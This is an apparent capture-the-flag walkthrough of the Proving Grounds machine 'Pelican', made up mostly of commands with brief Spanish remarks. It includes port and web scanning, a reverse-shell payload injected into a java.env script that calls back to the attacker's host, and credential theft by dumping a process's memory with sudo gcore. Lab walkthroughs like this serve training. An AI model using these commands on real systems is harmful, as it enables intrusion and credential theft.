Pelican

Pelican


ProvingGrounds Windows

nmap -A -p- -oA pelican 192.168.198.98 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA pelican 192.168.198.98

nmap -sU -O -p- -oA pelican-udp 192.168.198.98

nikto -h 192.168.198.98:80

ssh_command.

ssh_command.

http://192.168.198.98:8081

whatweb https://192.168.198.98:8081

ssh_command.

searchsploit -m 48654

ssh_command.

$(bash -i >& /dev/tcp/192.168.49.198/443 0>&1)

Intrroducimos esa linea en java.env script Le damos click a Commit

nc -lvnp 443

ssh_command.

cat /home/charles/local.txt

ssh_command.

sudo -l

ps -ef | grep password-store

ssh_command.

sudo gcore 493

ssh_command.

Vemos las credenciales

ssh_command.

su

cat /root/proof.txt

ssh_command.

© 2025 Cu3rv0x